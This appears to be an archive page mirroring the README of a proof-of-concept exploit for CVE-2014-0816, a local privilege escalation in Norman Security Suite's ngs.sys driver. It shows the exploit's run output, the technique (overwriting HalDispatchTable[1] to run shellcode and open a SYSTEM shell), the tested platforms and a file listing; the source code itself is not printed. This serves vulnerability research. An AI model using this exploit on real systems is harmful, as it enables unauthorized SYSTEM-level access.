Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2014-0816 PoC — Norman Security Suite 提权漏洞

Source
https://github.com/tandasat/CVE-2014-0816
Associated Vulnerability
Title:Norman Security Suite 提权漏洞 (CVE-2014-0816)
Description:Norman Security Suite是挪威Norman Safeground公司的一套杀毒软件。该软件包含杀毒、防火墙、反垃圾邮件、防恶意程序等功能,可全面保护计算机免受恶意程序和病毒软件的威胁。 Norman Security Suite 10.1及之前的版本中存在提权漏洞。本地攻击者可利用该漏洞获取特权,执行任意代码。
Description
CVE-2014-0816
Readme
CVE-2014-0816
=============

This is an exploit for CVE-2014-0816 ([JVNDB-2014-000026](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000026.html): Norman Security Suite vulnerable to privilege escalation). 

This exploit launches CMD.exe with SYSTEM privilege from Non-Administrator privilege by exploiting the vulnerability in an IOCTL handler of ngs.sys / ngs64.sys.     
    

Usage
-----------------
    C:\Users\user\Desktop> exploit_ngs.exe
    [*] Exploit Norman General Security Driver (ngs.sys / ngs64.sys)
    [*] Target file version: ver 5.0.740.0.
    [*] An address file was created at C:\Users\user\Desktop\address.bin.
    [*] Shellcode is located at 000000013F9357D0.
    [*] The device was opened as 0000000000000044.
    [*] The address file was opened as FFFFFFFF80000558.
    [+] HalDispatchTable[1] is located at FFFFF800033FDC68.
    [+] HalDispatchTable[1] was altered.
    [+] Shellcode was executed.
    [+] The SYSTEM shell was launched.
    [*] Press any key to finish this program.
 
Then you will see a new console.

    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Users\user\Desktop>whoami
    nt authority\system

    
The vulnerability allows an attacker to overwrite an arbitrary address with arbitrary value, so this exploit changes the value of HalDispatchTable[1] with an address of shellcode that escalates privilege of current process to SYSTEM privilege. 

![demo_win7_x64](/img/demo_win7_x64.png)

This vulnerability will be exploitable on all platforms from Windows XP to 8 both x86/x64, but this exploit is designed and tested certain platforms (for example, it will not function on Windows 8 because of SMEP).

Tested Platforms
-----------------
- Norman Security Suite 10.1
 - 2ad60239e6637132fcaa816348c6ec3b358db49e (ngs.sys)
 - 21da5771db8308292c9d88a16b73260be40f0b09 (ngs.sys)
 - d2e34871d4d0fe04087e89f9c9f3599193b8258a (ngs64.sys)
 - fa1ed5997466263c8f91d8a4f3a80e3712cf777e (ngs64.sys)
- Windows XP (x86) SP3 with Guest privilege
- Windows 7 (x86/x64) SP1 with Guest privilege
- Windows 10 (x64) Build 14393 with Guest privilege (SMEP disabled)

License
-----------------
This software is released under the MIT License, see LICENSE.
File Snapshot

 [4.0K]  /data/pocs/45b7d08ac23f49426016ad17f854b2fe293818a8
├── [4.0K]  exploit_ngs
│   ├── [4.0K]  exploit_ngs
│   │   ├── [ 11K]  exploit_ngs.cpp
│   │   ├── [7.8K]  exploit_ngs.vcxproj
│   │   ├── [1.0K]  exploit_ngs.vcxproj.filters
│   │   └── [4.0K]  shellcode.asm
│   ├── [1.3K]  exploit_ngs.sln
│   ├── [4.0K]  Release
│   │   ├── [162K]  exploit_ngs_7.exe
│   │   └── [162K]  exploit_ngs_XP.exe
│   └── [4.0K]  x64
│       └── [4.0K]  Release
│           ├── [248K]  exploit_ngs_10.exe
│           └── [184K]  exploit_ngs_7.exe
├── [4.0K]  img
│   └── [417K]  demo_win7_x64.png
├── [1.0K]  LICENSE.md
└── [2.2K]  README.md

6 directories, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.